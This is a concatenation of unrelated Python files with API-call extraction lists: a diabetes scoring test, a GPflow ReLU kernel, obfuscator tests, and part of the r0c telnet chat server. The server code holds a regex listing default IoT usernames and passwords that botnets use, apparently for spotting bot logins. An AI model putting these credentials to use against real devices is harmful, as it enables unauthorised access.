5589), True, 'import numpy as np\n'), ((9083, 9104), 'numpy.array', 'np.array', (['kpts_result'], {}), '(kpts_result)\n', (9091, 9104), True, 'import numpy as np\n'), ((9122, 9145), 'numpy.array', 'np.array', (['scores_result'], {}), '(scores_result)\n', (9130, 9145), True, 'import numpy as np\n'), ((9600, 9615), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (9613, 9615), False, 'import torch\n'), ((9631, 9659), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (9647, 9659), False, 'import cv2\n'), ((5420, 5438), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (5430, 5438), True, 'import numpy as np\n'), ((5440, 5457), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (5450, 5457), True, 'import numpy as np\n'), ((6674, 6745), 'detector.yolo_human_det', 'yolo_det', (['frame', 'human_model'], {'reso': 'det_dim', 'confidence': 'args.thred_score'}), '(frame, human_model, reso=det_dim, confidence=args.thred_score)\n', (6682, 6745), True, 'from detector import yolo_human_det as yolo_det\n'), ((7738, 7753), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7751, 7753), False, 'import torch\n'), ((7845, 7893), 'utils.utilitys.PreProcess', 'PreProcess', (['frame', 'track_bboxs', 'cfg', 'num_peroson'], {}), '(frame, track_bboxs, cfg, num_peroson)\n', (7855, 7893), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((7952, 7977), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (7975, 7977), False, 'import torch\n'), ((8254, 8302), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17, 2)'], {'dtype': 'np.float32'}), '((num_peroson, 17, 2), dtype=np.float32)\n', (8262, 8302), True, 'import numpy as np\n'), ((8324, 8369), 'numpy.zeros', 'np.zeros', (['(num_peroson, 17)'], {'dtype': 'np.float32'}), '((num_peroson, 17), dtype=np.float32)\n', (8332, 8369), True, 'import numpy as np\n'), ((8782, 8823), 'utils.utilitys.plot_keypoint', 'plot_keypoint', (['frame', 'preds', 'maxvals', '(0.3)'], {}), '(frame, preds, maxvals, 0.3)\n', (8795, 8823), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((8922, 8948), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (8932, 8948), False, 'import cv2\n'), ((8967, 8981), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (8978, 8981), False, 'import cv2\n'), ((11242, 11288), 'utils.utilitys.PreProcess', 'PreProcess', (['frame', 'bboxs', 'cfg', 'args.num_person'], {}), '(frame, bboxs, cfg, args.num_person)\n', (11252, 11288), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n'), ((11346, 11371), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (11369, 11371), False, 'import torch\n'), ((12280, 12304), 'json.dump', 'json.dump', (['kpts_info', 'fw'], {}), '(kpts_info, fw)\n', (12289, 12304), False, 'import json\n'), ((8172, 8190), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (8182, 8190), True, 'import numpy as np\n'), ((8192, 8209), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (8202, 8209), True, 'import numpy as np\n'), ((9987, 10044), 'detector.yolo_human_det', 'yolo_det', (['frame', 'human_model'], {'confidence': 'args.thred_score'}), '(frame, human_model, confidence=args.thred_score)\n', (9995, 10044), True, 'from detector import yolo_human_det as yolo_det\n'), ((11572, 11590), 'numpy.asarray', 'np.asarray', (['center'], {}), '(center)\n', (11582, 11590), True, 'import numpy as np\n'), ((11637, 11654), 'numpy.asarray', 'np.asarray', (['scale'], {}), '(scale)\n', (11647, 11654), True, 'import numpy as np\n'), ((8739, 8754), 'utils.utilitys.write', 'write', (['x', 'frame'], {}), '(x, frame)\n', (8744, 8754), False, 'from utils.utilitys import plot_keypoint, PreProcess, write, load_json\n')]
|
import os
import unittest
import pandas as pd
from diabetes.scoring.batch.run import batch_scoring
from diabetes.training.evaluate import split_data
from diabetes.training.train import train_model
class TestScoringBatchMethods(unittest.TestCase):
def test_batch_scoring(self):
ridge_args = {"alpha": 0.5}
data_file = os.path.join("tests/diabetes/data", "diabetes_unit_test.csv")
train_df = pd.read_csv(data_file).drop(columns=["SEX"])
data = split_data(train_df)
model = train_model(data["train"], ridge_args)
score_data_file = os.path.join("tests/diabetes/data", "scoring_dataset.csv")
score_df = pd.read_csv(score_data_file).drop(columns=["SEX"])
scores = batch_scoring(model, score_df)
self.assertAlmostEqual(scores[0], 60.75743442)
self.assertAlmostEqual(scores[1], 67.10061271)
|
[
"diabetes.training.evaluate.split_data",
"diabetes.scoring.batch.run.batch_scoring",
"pandas.read_csv",
"diabetes.training.train.train_model",
"os.path.join"
] |
[((340, 401), 'os.path.join', 'os.path.join', (['"""tests/diabetes/data"""', '"""diabetes_unit_test.csv"""'], {}), "('tests/diabetes/data', 'diabetes_unit_test.csv')\n", (352, 401), False, 'import os\n'), ((481, 501), 'diabetes.training.evaluate.split_data', 'split_data', (['train_df'], {}), '(train_df)\n', (491, 501), False, 'from diabetes.training.evaluate import split_data\n'), ((518, 556), 'diabetes.training.train.train_model', 'train_model', (["data['train']", 'ridge_args'], {}), "(data['train'], ridge_args)\n", (529, 556), False, 'from diabetes.training.train import train_model\n'), ((584, 642), 'os.path.join', 'os.path.join', (['"""tests/diabetes/data"""', '"""scoring_dataset.csv"""'], {}), "('tests/diabetes/data', 'scoring_dataset.csv')\n", (596, 642), False, 'import os\n'), ((730, 760), 'diabetes.scoring.batch.run.batch_scoring', 'batch_scoring', (['model', 'score_df'], {}), '(model, score_df)\n', (743, 760), False, 'from diabetes.scoring.batch.run import batch_scoring\n'), ((421, 443), 'pandas.read_csv', 'pd.read_csv', (['data_file'], {}), '(data_file)\n', (432, 443), True, 'import pandas as pd\n'), ((662, 690), 'pandas.read_csv', 'pd.read_csv', (['score_data_file'], {}), '(score_data_file)\n', (673, 690), True, 'import pandas as pd\n')]
|
import tensorflow as tf
import numpy as np
import gpflow
from gpflow.base import Parameter
from gpflow.utilities import positive
class ReLUKernel(gpflow.kernels.Kernel):
"""
Kernel such that the mean 0 GP with the corresponding covariance function is equal in distribution
to an infinitely wide BNN prior with mean O and "Neal scaling" on the weights. The recursive equations used
are from https://arxiv.org/abs/1711.00165.
"""
def __init__(self, prior_weight_std, prior_bias_std, depth):
"""
Args:
prior_weight_std: non-negative float or tuple
of length depth+1 of floats, corresponding BNN has prior variance prior_weight_std / sqrt(num_inputs)
If tuple separate standard deviation for each layer
prior_bias_std: non-negative float or tuple
of length depth+1 of floats, corresponding BNN has prior variance prior_bias_std
If tuple separate standard deviation for each layer
depth: int, number of hidden layers in corresponding BNN
"""
super(ReLUKernel, self).__init__()
if isinstance(prior_weight_std, float) or isinstance(prior_weight_std, int):
prior_weight_std = prior_weight_std * np.ones(depth + 1)
if isinstance(prior_bias_std, float) or isinstance(prior_bias_std, int):
prior_bias_std = prior_bias_std * np.ones(depth + 1)
assert len(prior_weight_std) == len(prior_bias_std) == depth + 1
self.weight_variance = Parameter(prior_weight_std ** 2, transform=positive(1e-5))
self.bias_variance = Parameter(prior_bias_std ** 2, transform=positive(1e-5))
self.depth = depth
def K(self, X, X2=None):
"""
Computes covariance matrix between k(X,X2), if X2 is None computes covariance matrix k(X,X)
Args:
X: [N,D] float
X2: None or [N,D] float, if None X2=X
Returns: [N,N] matrix k(X,X2)
"""
D = X.shape[1] # input dimension
jitter = 1e-15 # jitter for arccosine for numerical reasons
if X2 is None: # compute symmetric version
X2 = X
# base case for recursive formula
Ki = self.bias_variance[0] + self.weight_variance[0] * tf.matmul(X, X2, transpose_b=True) / D
KiX = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X), axis=1) / D
KiX2 = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X2), axis=1) / D
# flattened recursion
for i in range(1, self.depth + 1):
sqrt_term = tf.sqrt(KiX[:, None] * KiX2[None, :]) # outer product of norms
theta = tf.acos(jitter + (1 - 2 * jitter) * Ki/sqrt_term) # angle, 'squash' for numerical stability
J_term = tf.sin(theta) + (np.pi - theta) * tf.cos(theta)
# update kernel matrices
Ki = self.bias_variance[i] + self.weight_variance[i] / (2 * np.pi) * sqrt_term * J_term
if i != self.depth: # these are only needed for the recursion, don't update on last call
KiX = self.bias_variance[i] + KiX * self.weight_variance[i] / 2.
KiX2 = self.bias_variance[i] + KiX2 * self.weight_variance[i] / 2.
return Ki
def K_diag(self, X):
"""
Computes diagonal entries of k(X,X)
Args:
X: [N,D] float
Returns: [N] float. diag(k(X,X))
"""
D = X.shape[1] # input dimension
KiX = self.bias_variance[0] + self.weight_variance[0] * tf.reduce_sum(tf.square(X), axis=1) / D
for i in range(1, self.depth + 1):
KiX = self.bias_variance[i] + KiX * self.weight_variance[i] / 2.
return KiX
|
[
"tensorflow.sin",
"gpflow.utilities.positive",
"numpy.ones",
"tensorflow.acos",
"tensorflow.matmul",
"tensorflow.square",
"tensorflow.sqrt",
"tensorflow.cos"
] |
[((2614, 2651), 'tensorflow.sqrt', 'tf.sqrt', (['(KiX[:, None] * KiX2[None, :])'], {}), '(KiX[:, None] * KiX2[None, :])\n', (2621, 2651), True, 'import tensorflow as tf\n'), ((2698, 2749), 'tensorflow.acos', 'tf.acos', (['(jitter + (1 - 2 * jitter) * Ki / sqrt_term)'], {}), '(jitter + (1 - 2 * jitter) * Ki / sqrt_term)\n', (2705, 2749), True, 'import tensorflow as tf\n'), ((1252, 1270), 'numpy.ones', 'np.ones', (['(depth + 1)'], {}), '(depth + 1)\n', (1259, 1270), True, 'import numpy as np\n'), ((1398, 1416), 'numpy.ones', 'np.ones', (['(depth + 1)'], {}), '(depth + 1)\n', (1405, 1416), True, 'import numpy as np\n'), ((1564, 1579), 'gpflow.utilities.positive', 'positive', (['(1e-05)'], {}), '(1e-05)\n', (1572, 1579), False, 'from gpflow.utilities import positive\n'), ((1650, 1665), 'gpflow.utilities.positive', 'positive', (['(1e-05)'], {}), '(1e-05)\n', (1658, 1665), False, 'from gpflow.utilities import positive\n'), ((2812, 2825), 'tensorflow.sin', 'tf.sin', (['theta'], {}), '(theta)\n', (2818, 2825), True, 'import tensorflow as tf\n'), ((2267, 2301), 'tensorflow.matmul', 'tf.matmul', (['X', 'X2'], {'transpose_b': '(True)'}), '(X, X2, transpose_b=True)\n', (2276, 2301), True, 'import tensorflow as tf\n'), ((2846, 2859), 'tensorflow.cos', 'tf.cos', (['theta'], {}), '(theta)\n', (2852, 2859), True, 'import tensorflow as tf\n'), ((2384, 2396), 'tensorflow.square', 'tf.square', (['X'], {}), '(X)\n', (2393, 2396), True, 'import tensorflow as tf\n'), ((2489, 2502), 'tensorflow.square', 'tf.square', (['X2'], {}), '(X2)\n', (2498, 2502), True, 'import tensorflow as tf\n'), ((3580, 3592), 'tensorflow.square', 'tf.square', (['X'], {}), '(X)\n', (3589, 3592), True, 'import tensorflow as tf\n')]
|
import json
import pathlib
def save_json(obj, path: str):
with open(path, 'w') as f:
json.dump(obj, f)
def load_json(path: str):
with open(path, 'r') as f:
obj = json.load(f)
return obj
def mkdirs_if_not_exist(path, verbose: bool = False):
path = pathlib.Path(path)
if not path.exists():
if verbose:
print(f'directory {path} does not exist. creating...')
path.mkdir(parents=True, exist_ok=True)
|
[
"json.dump",
"pathlib.Path",
"json.load"
] |
[((285, 303), 'pathlib.Path', 'pathlib.Path', (['path'], {}), '(path)\n', (297, 303), False, 'import pathlib\n'), ((99, 116), 'json.dump', 'json.dump', (['obj', 'f'], {}), '(obj, f)\n', (108, 116), False, 'import json\n'), ((190, 202), 'json.load', 'json.load', (['f'], {}), '(f)\n', (199, 202), False, 'import json\n')]
|
import subprocess
if __name__ == '__main__':
subprocess.call("python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25", shell=True)
|
[
"subprocess.call"
] |
[((50, 179), 'subprocess.call', 'subprocess.call', (['"""python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25"""'], {'shell': '(True)'}), "(\n 'python3 index.py -p /Users/zhouwei/Desktop/python/pythonLearn/gif/test.jpg -t 16 -s 1.25'\n , shell=True)\n", (65, 179), False, 'import subprocess\n')]
|
import pytest
from os.path import join
import io
from logic.obfuscatefile import source_statement_gen
def test_get_source_statements(tmpdir):
#
# Create a short source file
#
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u'from x import y\n')
# Test a lines which continues with a \ --they should be merged
source.write(u'from z import a, \\ \n')
source.write(u'b, \\ \n')
source.write(u'c \n')
# Test a single-line doc string --it should be skipped
source.write(u'"""Single line-doc string with double-quotes."""\n')
source.write(u"'''Single line-doc string with single-quotes.'''\n")
# Test a multi-line doc string --they should be skipped
source.write(u'""" Multi-line \n')
source.write(u'doc string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"''' Multi-line \n")
source.write(u"doc string \n")
source.write(u"with single-quotes.\n")
source.write(u"'''\n")
# Test comment lines --it should be skipped
source.write(u' # This is a comment\n')
# Test code lines with comments,
# these will not be stripped by statement but rather by transformation
source.write(u' some_func(x) # Comment\n')
# Test skip platform block
source.write(u' # {+android}\n')
source.write(u' android_func(x)\n')
source.write(u' # {-android}\n')
# Keep kivy directives
source.write(u'#: scenario xyz\n')
# Treat line continuation with parens --they should be merged
source.write(u' row = get(\n')
source.write(u' dist_id if dist_id\n')
source.write(u' else var.dist.id)\n')
# Treat lines with parens in quotes --parens should be ignored
source.write(u'this "( should be a complete line("\n')
source.write(u"...as ')' should this')'\n")
# Treat multiline triple-quoted variable strings as strings
source.write(u'x = """ Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n') # End with stand-alone quotes
source.write(u"x =''' Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n") # End with quotes at end
# Treat multiline triple-quoted strings as strings
source.write(u'"""\n')
source.write(u'Multi-line \n')
source.write(u'string \n')
source.write(u'with double-quotes.\n')
source.write(u'"""\n')
source.write(u"'''\n")
source.write(u"Multi-line \n")
source.write(u"string \n")
source.write(u"with single-quotes.'''\n")
#
# Read source file for iOS platform (should skip android lines)
#
get_statement_gen = source_statement_gen(source_file, dir_name,
platform='iOS')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
assert get_statement_gen.next()
#
# Read source file for android platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name, platform='android')
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
#
# Read source file for default platform (should include android lines)
#
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (u'from x import y', False)
assert get_statement_gen.next() == (u'from z import a, b, c', False)
assert get_statement_gen.next() == \
(u' some_func(x) # Comment', False)
assert get_statement_gen.next() == \
(u' android_func(x)', False)
assert get_statement_gen.next() == \
(u'#: scenario xyz', False)
assert get_statement_gen.next() == \
(u' row = get( dist_id if dist_id else var.dist.id)', False)
assert get_statement_gen.next() == \
(u'this "( should be a complete line("', False)
assert get_statement_gen.next() == \
(u"...as ')' should this')'", False)
# Quote variable string
assert get_statement_gen.next() == \
(u'x = """ Multi-line', False)
assert get_statement_gen.next() == \
(u'string', False)
assert get_statement_gen.next() == \
(u'with double-quotes.', False)
assert get_statement_gen.next() == \
(u'"""', False)
assert get_statement_gen.next() == \
(u"x =''' Multi-line", False)
assert get_statement_gen.next() == \
(u"string", False)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", False)
# Quote string
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u'Multi-line', True)
assert get_statement_gen.next() == \
(u'string', True)
assert get_statement_gen.next() == \
(u'with double-quotes.', True)
assert get_statement_gen.next() == \
(u'"""', True)
assert get_statement_gen.next() == \
(u"'''", True)
assert get_statement_gen.next() == \
(u"Multi-line", True)
assert get_statement_gen.next() == \
(u"string", True)
assert get_statement_gen.next() == \
(u"with single-quotes.'''", True)
with pytest.raises(StopIteration):
get_statement_gen.next()
def test_get_source_statements_multiple_parens(tmpdir):
dir_name = str(tmpdir.mkdir('source'))
source_file = 'app.py'
# Test with adjacent single quotes
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"class ValidationError(Exception):\n")
source.write(u"def __init__(self, message='', title=_('Error')):\n")
source.write(u"self.message = message\n")
source.write(u"self.title = title\n")
get_statement_gen = source_statement_gen(
source_file, dir_name)
assert get_statement_gen.next() == (
u"class ValidationError(Exception):", False)
assert get_statement_gen.next() == (
u"def __init__(self, message='', title=_('Error')):", False)
assert get_statement_gen.next() == (u"self.message = message", False)
assert get_statement_gen.next() == (u"self.title = title", False)
# Test with quoted parens
with io.open(join(dir_name, source_file), 'w') as source:
# Test a python line
source.write(u"self.lpar = Literal('(').suppress()\n")
source.write(u"self.rpar = Literal(')').suppress()\n")
get_statement_gen = source_statement_gen(source_file, dir_name)
assert get_statement_gen.next() == (
u"self.lpar = Literal('(').suppress()", False)
assert get_statement_gen.next() == (
u"self.rpar = Literal(')').suppress()", False)
with pytest.raises(StopIteration):
get_statement_gen.next()
|
[
"pytest.raises",
"os.path.join",
"logic.obfuscatefile.source_statement_gen"
] |
[((3041, 3100), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {'platform': '"""iOS"""'}), "(source_file, dir_name, platform='iOS')\n", (3061, 3100), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((5146, 5209), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {'platform': '"""android"""'}), "(source_file, dir_name, platform='android')\n", (5166, 5209), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((7294, 7337), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (7314, 7337), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((9891, 9934), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (9911, 9934), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((10564, 10607), 'logic.obfuscatefile.source_statement_gen', 'source_statement_gen', (['source_file', 'dir_name'], {}), '(source_file, dir_name)\n', (10584, 10607), False, 'from logic.obfuscatefile import source_statement_gen\n'), ((4964, 4992), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (4977, 4992), False, 'import pytest\n'), ((7118, 7146), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (7131, 7146), False, 'import pytest\n'), ((9312, 9340), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (9325, 9340), False, 'import pytest\n'), ((10809, 10837), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (10822, 10837), False, 'import pytest\n'), ((276, 303), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (280, 303), False, 'from os.path import join\n'), ((9559, 9586), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (9563, 9586), False, 'from os.path import join\n'), ((10340, 10367), 'os.path.join', 'join', (['dir_name', 'source_file'], {}), '(dir_name, source_file)\n', (10344, 10367), False, 'from os.path import join\n')]
|
# coding: utf-8
from __future__ import print_function
from .__init__ import EP, PY2, COLORS, IRONPY, unicode
from . import util as Util
from . import chat as Chat
from . import user as User
import os
import re
import time
import zlib
import socket
import threading
import binascii
from datetime import datetime
import operator
print = Util.print
if PY2:
from Queue import Queue
else:
from queue import Queue
class VT100_Server(object):
def __init__(self, host, port, world, other_if):
self.ar = world.ar
self.other_if = other_if
self.world = world
self.clients = []
self.user_config = {}
self.user_config_path = None
self.user_config_changed = False
self.re_bot = re.compile(
"root|Admin|admin|default|support|user|password|telnet|"
+ "guest|operator|supervisor|daemon|service|enable|system|"
+ "manager|baby|netman|telecom|volition|davox|sysadm|busybox|"
+ "tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|"
+ "HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|"
+ "taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|"
+ "t0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|"
+ "xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|"
+ "ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen"
)
self.scheduled_kicks = []
self.next_scheduled_kick = None
self.ep = (host, port)
self.srv_sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.srv_sck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.srv_sck.bind(self.ep)
self.srv_sck.listen(1)
if IRONPY:
self.__eq__ = self.ipy__eq__
self.__ne__ = self.ipy__ne__
def ipy__eq__(self, other):
return id(self) == id(other)
def ipy__ne__(self, other):
return id(self) != id(other)
def con(self, msg, adr, add=0):
ht = time.strftime("%d/%m/%Y, %H:%M:%S")
print(
" {0} {1} {2} {3} :{4}".format(
msg, ht, len(self.clients) + add, adr[0], adr[1]
)
)
def gen_remote(self, socket, addr, usr):
raise RuntimeError("inherit me")
def handle_error(self):
Util.whoops()
def handle_accept(self):
with self.world.mutex:
# https://github.com/9001/r0c/issues/1
# self.addr becomes None when a client disconnects,
# and socket.getpeername()[0] will raise exceptions
#
# smoke test:
# yes 127.0.0.1 | nmap -v -iL - -Pn -sT -p 2323,1531 -T 5
try:
socket, addr = self.srv_sck.accept()
adr = [addr[0], addr[1]]
if len(socket.getpeername()[0]) < 3:
raise Exception
except:
print("[!] handshake error (probably a port scanner)")
return
usr = User.User(self.world, adr)
remote = self.gen_remote(socket, adr, usr)
self.world.add_user(usr)
self.clients.append(remote)
self.world.cserial += 1
remote.conf_wizard(0)
kick_msg = " wizardkick: {0} {1}".format(remote.user.nick, remote.adr[0])
self.schedule_kick(remote, 600, kick_msg)
print(
"client join: {0} {2} {3} {1}".format(
remote.user.nick, len(self.clients), *list(remote.adr)
)
)
def part(self, remote, announce=True):
# TODO should probably set this inside the lock? check if that's safe
remote.dead = True
with self.world.mutex:
# Util.whoops("client part")
try:
remote.socket.shutdown(socket.SHUT_RDWR)
remote.socket.close()
except:
pass
if announce:
print(
"client part: {0} {2} {3} {1}".format(
remote.user.nick, len(self.clients) - 1, *list(remote.adr)
)
)
self.clients.remove(remote)
self.world.cserial += 1
try:
remote.user.active_chan = None
remote.user.old_active_chan = None
remote.user.new_active_chan = None
except:
pass
for uchan in list(remote.user.chans):
self.world.part_chan(uchan)
if remote.user and remote.user in self.world.users:
self.world.users.remove(remote.user)
if remote.wire_log is not None:
remote.wire_log.write(
"{0:.0f}\n".format(time.time() * 1000).encode("utf-8")
)
remote.wire_log.close()
def schedule_kick(self, remote, timeout, msg=None):
timeout += time.time()
self.scheduled_kicks.append([timeout, remote, msg])
if self.next_scheduled_kick is None or self.next_scheduled_kick > timeout:
self.next_scheduled_kick = timeout
def unschedule_kick(self, remote):
self.scheduled_kicks = [x for x in self.scheduled_kicks if x[1] != remote]
def load_configs(self):
with self.world.mutex:
if not self.user_config_path:
raise RuntimeError("inheritance bug: self.user_config_path not set")
self.user_config = {}
self.user_config_changed = False
if not os.path.isfile(self.user_config_path):
print(" * {0} knows 0 clients".format(self.__class__.__name__))
return
panic = False
with open(self.user_config_path, "rb") as f:
f.readline() # discard version info
try:
for ln in [x.decode("utf-8").strip() for x in f]:
k, v = ln.split(u" ", 1)
self.user_config[k] = v
except:
print(" /!\\ invalid config line")
try:
print(ln)
except:
pass
if panic:
raise RuntimeError("see above")
print(
" * {0} knows {1} clients".format(
self.__class__.__name__, len(self.user_config)
)
)
def save_configs(self):
with self.world.mutex:
if not self.user_config_changed:
return
self.user_config_changed = False
with open(self.user_config_path, "wb") as f:
f.write("1\n".encode("utf-8"))
for k, v in sorted(self.user_config.items()):
f.write((u" ".join([k, v]) + u"\n").encode("utf-8"))
print(
" * {0} saved {1} client configs".format(
self.__class__.__name__, len(self.user_config)
)
)
class VT100_Client(object):
def __init__(self, host, socket, address, world, usr):
self.ar = world.ar
self.host = host
self.socket = socket
self.adr = address
self.world = world
self.user = usr
self.dead = False # set true at disconnect
self.is_bot = False
self.wire_log = None
if self.ar.log_rx or self.ar.log_tx:
log_fn = "{0}wire/{1}_{2}_{3}".format(
EP.log, int(time.time()), *list(self.adr)
)
while os.path.isfile(log_fn):
log_fn += "_"
self.wire_log = open(log_fn, "wb")
self.wire_log.write("{0:.0f}\n".format(time.time() * 1000).encode("utf-8"))
self.uee_offset = 0
try:
x = b"\xfe"
x.decode("utf-8")
except UnicodeDecodeError as uee:
self.uee_offset = -uee.start
# outgoing data
self.outbox = Queue()
self.replies = Queue()
self.last_tx = None
# incoming data
self.backlog = b""
self.in_bytes = b""
self.in_text = u""
self.in_text_full = u""
self.num_telnet_negotiations = 0
self.slowmo_tx = 0
self.slowmo_skips = 0 # remaining cycles to skip
self.set_codec("utf-8")
# incoming requests
self.scroll_cmd = None
self.scroll_i = None
self.scroll_f = 1
# input buffer
self.linebuf = u""
self.linepos = 0
self.lineview = 0
self.msg_hist = []
self.msg_hist_n = None
self.msg_not_from_hist = False
self.left_chrome = u""
# tabcomplete registers
self.tc_nicks = None
self.tc_msg_pre = None
self.tc_msg_post = None
# state registers
self.wizard_stage = "start"
self.wizard_lastlen = 0
self.wizard_maxdelta = 0
self.wizard_mindelta = 9001
self.iface_confirmed = False
self.handshake_sz = False
self.handshake_world = False
self.show_hilight_tutorial = True
self.need_full_redraw = False
self.too_small = False
self.screen = []
self.w = 80
self.h = 24
self.pending_size_request = False
self.size_request_action = None
self.re_cursor_pos = re.compile(r"\033\[([0-9]{1,4});([0-9]{1,4})R")
self.msg_too_small = [
u"your screen is too small",
u"screen is too small",
u"screen too small",
u"screen 2 small",
u"scrn 2 small",
u"too small",
u"2 small",
u"2 smol",
u"2smol",
u":(",
]
self.codec_map = [
"utf-8",
0,
"cp437",
0,
"shift_jis",
0,
"latin1",
1,
"ascii",
2,
]
self.codec_uni = [u"├┐ ┌┬┐ ┌ ", u"Ð Ñ Ã ", u"all the above are messed up "]
self.codec_asc = [u"hmr", u"DNA", u"n/a"]
self.esc_tab = {}
self.add_esc(u"\x1b\x5bD", "cl")
self.add_esc(u"\x1b\x5bC", "cr")
self.add_esc(u"\x1b\x5bA", "cu")
self.add_esc(u"\x1b\x5bB", "cd")
self.add_esc(u"\x1b\x5b\x31\x7e", "home")
self.add_esc(u"\x1b\x5b\x34\x7e", "end")
self.add_esc(u"\x1b\x5b\x35\x7e", "pgup")
self.add_esc(u"\x1b\x5b\x36\x7e", "pgdn")
self.add_esc(u"\x08", "bs")
self.add_esc(u"\x09", "tab")
